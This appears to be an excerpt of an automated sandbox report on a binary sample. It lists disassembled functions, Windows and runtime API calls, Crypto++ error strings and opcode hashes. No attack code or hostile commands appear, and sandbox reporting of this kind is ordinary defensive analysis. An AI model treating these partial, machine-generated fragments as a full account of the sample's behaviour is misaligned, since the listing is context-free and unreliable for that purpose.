                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 573037752-0
                                                                                                        • Opcode ID: 8aec19df3326d1254062dcf8d9918830d3bc8d2f1fd50e02e3113257ba16b54c
                                                                                                        • Instruction ID: 2c1f0da0a7ed76533f7a7dfabfb4b80276b227170043514a8770e9fb86597bad
                                                                                                        • Opcode Fuzzy Hash: 8aec19df3326d1254062dcf8d9918830d3bc8d2f1fd50e02e3113257ba16b54c
                                                                                                        • Instruction Fuzzy Hash: 22A1AE70A002099FDB15DFA8C98476EBBB4FF44314F244198F909AB3A1DB35ED56CB91
                                                                                                        Function 00B3C627 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282221369-0
                                                                                                        • Opcode ID: 85f1cd16e7eccd8b6a533d12f6c25c2dbeb976aa0e18ce0c9a6ebfa1704ed3fc
                                                                                                        • Instruction ID: 7309b3b064e228905d31f361ff4d8750e813bbaa572bf36ce484214033241681
                                                                                                        • Opcode Fuzzy Hash: 85f1cd16e7eccd8b6a533d12f6c25c2dbeb976aa0e18ce0c9a6ebfa1704ed3fc
                                                                                                        • Instruction Fuzzy Hash: F161F572900355ABDB21AFF4988276E7FE5EF06320F2451EEE945B7281EF359D008B90
                                                                                                        Function 00B31376 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00B31620
                                                                                                        • _free.LIBCMT ref: 00B31691
                                                                                                        • _free.LIBCMT ref: 00B316AA
                                                                                                        • _free.LIBCMT ref: 00B316DC
                                                                                                        • _free.LIBCMT ref: 00B316E5
                                                                                                        • _free.LIBCMT ref: 00B316F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                        • String ID: C
                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                        • Opcode ID: 033f6addefc636dc26416813d97c2bde92e9fbd0801cd34ae28934af7f5a4cda
                                                                                                        • Instruction ID: 4bc901942465f62b66fe73a2de653492100a59bb315b7c6e82ebb1fa97a48bf4
                                                                                                        • Opcode Fuzzy Hash: 033f6addefc636dc26416813d97c2bde92e9fbd0801cd34ae28934af7f5a4cda
                                                                                                        • Instruction Fuzzy Hash: 5BB11A75901219DBDB24DF18C885AADB7F8FB58314F6449EAE84AA7350E770AE90CF40
                                                                                                        Function 00ABD300 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 243COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD4DC
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD57D
                                                                                                        Strings
                                                                                                        • FilterWithBufferedInput, xrefs: 00ABD554
                                                                                                        • StreamTransformationFilter: W3C_PADDING cannot be used with , xrefs: 00ABD3C0
                                                                                                        • BlockPaddingScheme, xrefs: 00ABD356
                                                                                                        • StreamTransformationFilter: PKCS_PADDING cannot be used with , xrefs: 00ABD4B8
                                                                                                        • StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with , xrefs: 00ABD3F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: BlockPaddingScheme$FilterWithBufferedInput$StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with $StreamTransformationFilter: PKCS_PADDING cannot be used with $StreamTransformationFilter: W3C_PADDING cannot be used with
                                                                                                        • API String ID: 2005118841-2286867357
                                                                                                        • Opcode ID: 3963d4fb1be719716596c7d7084372aaa5e769417423d557675c1d69f2706845
                                                                                                        • Instruction ID: 29fac5737181ac8ba4e4a7c148a7b8e08849600fe0e6bed06d606d6470003d3f
                                                                                                        • Opcode Fuzzy Hash: 3963d4fb1be719716596c7d7084372aaa5e769417423d557675c1d69f2706845
                                                                                                        • Instruction Fuzzy Hash: 3C815A75A00219EFCB14DF64C884FDABBF8FF49714F1045A9E815A72A2EB71AD44CB90
                                                                                                        Function 00A7D5C0 Relevance: 12.4, APIs: 8, Instructions: 350fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0,00000000,774D3560), ref: 00A7D61D
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 00A7D645
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A7D69E
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00A7D6D8
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-00B90110,00000000,-00B90110,00000000), ref: 00A7D74F
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D8DB
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D917
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7D91E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$CloseCreateErrorHandleModeReadSizeWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1214154791-0
                                                                                                        • Opcode ID: 61404a0231b0ac129422bead7e7fcd9eb68b1933de5a9f63673802aadd322c39
                                                                                                        • Instruction ID: 34397682317189763e6f9f09d07651546006c2262b2be73f9b1028d37d112934
                                                                                                        • Opcode Fuzzy Hash: 61404a0231b0ac129422bead7e7fcd9eb68b1933de5a9f63673802aadd322c39
                                                                                                        • Instruction Fuzzy Hash: 53D1CD71D00258EFEB24DFA4CD85BDDBBB5BF49304F148198E408AB291DBB45A88CF91
                                                                                                        Function 00AFCF40 Relevance: 12.1, APIs: 8, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::locale::_Init.LIBCPMT ref: 00AFCF70
                                                                                                          • Part of subcall function 00AE89F6: __EH_prolog3.LIBCMT ref: 00AE89FD
                                                                                                          • Part of subcall function 00AE89F6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8A08
                                                                                                          • Part of subcall function 00AE89F6: std::locale::_Setgloballocale.LIBCPMT ref: 00AE8A23
                                                                                                          • Part of subcall function 00AE89F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8A79
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AFCFAC
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AFCFF4
                                                                                                        • __Getcvt.LIBCPMT ref: 00AFD001
                                                                                                          • Part of subcall function 00A72A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A72A56
                                                                                                          • Part of subcall function 00A72A30: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72AEA
                                                                                                        • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00AFD044
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AFD064
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AFD085
                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00AFD094
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$std::locale::_$Lockit::_Lockit::~_$Locimp::_Locinfo::_$AddfacGetcvtH_prolog3InitLocimpLocimp_Locinfo_ctorLocinfo_dtorNew_Setgloballocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 1428944335-0
                                                                                                        • Opcode ID: c0320fd325643e3225042d3a4fa32aa9f3f5ef484bd0556d185fc5eb4fe4b8bc
                                                                                                        • Instruction ID: 1beb32404691136eeb20d5ba14c1e0c164520ecf9eb16b1ad996cdd2e98db8fc
                                                                                                        • Opcode Fuzzy Hash: c0320fd325643e3225042d3a4fa32aa9f3f5ef484bd0556d185fc5eb4fe4b8bc
                                                                                                        • Instruction Fuzzy Hash: E551E370C00749DFDB21DFA4C9457AEBBF4FF14304F10426AE809AB252EB74AA44CB91
                                                                                                        Function 00B0A58C Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B0A5AE
                                                                                                          • Part of subcall function 00B08978: __EH_prolog3_catch.LIBCMT ref: 00B0897F
                                                                                                          • Part of subcall function 00B08978: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B089B8
                                                                                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B0A5D5
                                                                                                        • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B0A5E1
                                                                                                          • Part of subcall function 00B08978: InterlockedPopEntrySList.KERNEL32(?), ref: 00B08A01
                                                                                                          • Part of subcall function 00B08978: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00B08A30
                                                                                                          • Part of subcall function 00B08978: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00B08A3E
                                                                                                        • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00B0A62D
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 00B0A64E
                                                                                                        • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00B0A656
                                                                                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B0A668
                                                                                                        • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00B0A698
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Base::Concurrency::details::$Scheduler$ContextThrottling$InternalTime$AssignBlockedChangeConcurrency::location::_EntryH_prolog3_catchInterlockedListNextProcessorRingSchedulingSpinStartupTimerUntilVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 905052649-0
                                                                                                        • Opcode ID: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
                                                                                                        • Instruction ID: 4a1f11cdcfbab6d9453b9a676bcdc065371e017005a0fb5b411c9aacfb225d78
                                                                                                        • Opcode Fuzzy Hash: 19b773f214a92d81b0263ae4e59a1b4458d1b18e08398e6443640f62689cc304
                                                                                                        • Instruction Fuzzy Hash: 4931F630B003515ECF16AA7848967FEBFF99F51300F0809E5D456E72C2DE254D498792
                                                                                                        Function 00AB6600 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 310COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB67A3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB67E3
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB6981
                                                                                                        Strings
                                                                                                        • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 00AB677A
                                                                                                        • PK_DefaultEncryptionFilter: plaintext too long, xrefs: 00AB6958
                                                                                                        • : invalid ciphertext, xrefs: 00AB67B7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long
                                                                                                        • API String ID: 2005118841-2902848663
                                                                                                        • Opcode ID: a77314c3cf985df51691068451ab6bbd88bcfdda3c6e87cf716376b1308884cb
                                                                                                        • Instruction ID: ce44d639d3070e048b9b1a3a006305ee401b823453d323f24124fb00f450778c
                                                                                                        • Opcode Fuzzy Hash: a77314c3cf985df51691068451ab6bbd88bcfdda3c6e87cf716376b1308884cb
                                                                                                        • Instruction Fuzzy Hash: D1B1AC71A00709AFCB24DFA4C994FEABBF8FF48704F00466DE54697691EB75A904CB50
                                                                                                        Function 00B3D3AE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: ad6c2c17ec5a1efb638bb31d035133cc74d12f8591b8131da5c6ec3c37ed2d18
                                                                                                        • Instruction ID: 3d603ce909777af3249b583ef4f416f93b128fef72acd5bfb7d6c534bf99adc6
                                                                                                        • Opcode Fuzzy Hash: ad6c2c17ec5a1efb638bb31d035133cc74d12f8591b8131da5c6ec3c37ed2d18
                                                                                                        • Instruction Fuzzy Hash: B161A472D00205AFDB20DF68D881BAABBF5EF55720F3541EAE944EB291E730AD41CB50
                                                                                                        Function 00B34FAD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(?,00B2AB2E,E0830C40,?,?,?,?,?,?,00B35722,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76), ref: 00B34FEF
                                                                                                        • __fassign.LIBCMT ref: 00B3506A
                                                                                                        • __fassign.LIBCMT ref: 00B35085
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00B2AB2E,00000001,?,00000005,00000000,00000000), ref: 00B350AB
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00B35722,00000000,?,?,?,?,?,?,?,?,?,00B35722,00AE8F76), ref: 00B350CA
                                                                                                        • WriteFile.KERNEL32(?,00AE8F76,00000001,00B35722,00000000,?,?,?,?,?,?,?,?,?,00B35722,00AE8F76), ref: 00B35103
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: ff44b59935c7c574f5b3b9d61d7aed3026bf391c0cbf074dc7ce8b27fef48c99
                                                                                                        • Instruction ID: 880ec7e54d215dc70681fcf0d6352fa912b2535651d4ccf59c9e28e99b3a4822
                                                                                                        • Opcode Fuzzy Hash: ff44b59935c7c574f5b3b9d61d7aed3026bf391c0cbf074dc7ce8b27fef48c99
                                                                                                        • Instruction Fuzzy Hash: 645185B19006499FDB24CFA8D885BEEBBF4EF09300F25419AE555F7291E731A941CB60
                                                                                                        Function 00B155C6 Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00B155CD
                                                                                                        • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00B15618
                                                                                                        • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00B1564B
                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B156D3
                                                                                                        • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00B156FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountCounter::_H_prolog3_catchRegisterReleaseStateState::_Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 1066115758-0
                                                                                                        • Opcode ID: ad790e7b1f621545c9820a7a7cc29a485b83603f980685cd2b38a6c98f22d6d6
                                                                                                        • Instruction ID: a72145a8326b3a4bc7212d17485ce4874b8919d961138ca290e50350c69454e5
                                                                                                        • Opcode Fuzzy Hash: ad790e7b1f621545c9820a7a7cc29a485b83603f980685cd2b38a6c98f22d6d6
                                                                                                        • Instruction Fuzzy Hash: 374174B1A00A05EFCB14DF69C8919EDFBF5FF88310754866DE41997391DB30A941CB90
                                                                                                        Function 00B190D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19107
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00B1910F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19198
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00B191C3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B19218
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: ffdb2ec94bd9e15ce6c970f7999cde23816424b86646f8eaa92c29bb7fee14f9
                                                                                                        • Instruction ID: 8d89ff7094ce184dadfd7fb63a87d70c33273de9a00d96572496712012c1929d
                                                                                                        • Opcode Fuzzy Hash: ffdb2ec94bd9e15ce6c970f7999cde23816424b86646f8eaa92c29bb7fee14f9
                                                                                                        • Instruction Fuzzy Hash: 5F41B634D00255BBCF10DF68C899ADE7BF5EF45314F5480D5E818AB352D731AA91CB91
                                                                                                        Function 00B128CD Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00B128F5
                                                                                                          • Part of subcall function 00B12662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B12695
                                                                                                          • Part of subcall function 00B12662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00B126B7
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B12972
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B1297E
                                                                                                        • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00B1298D
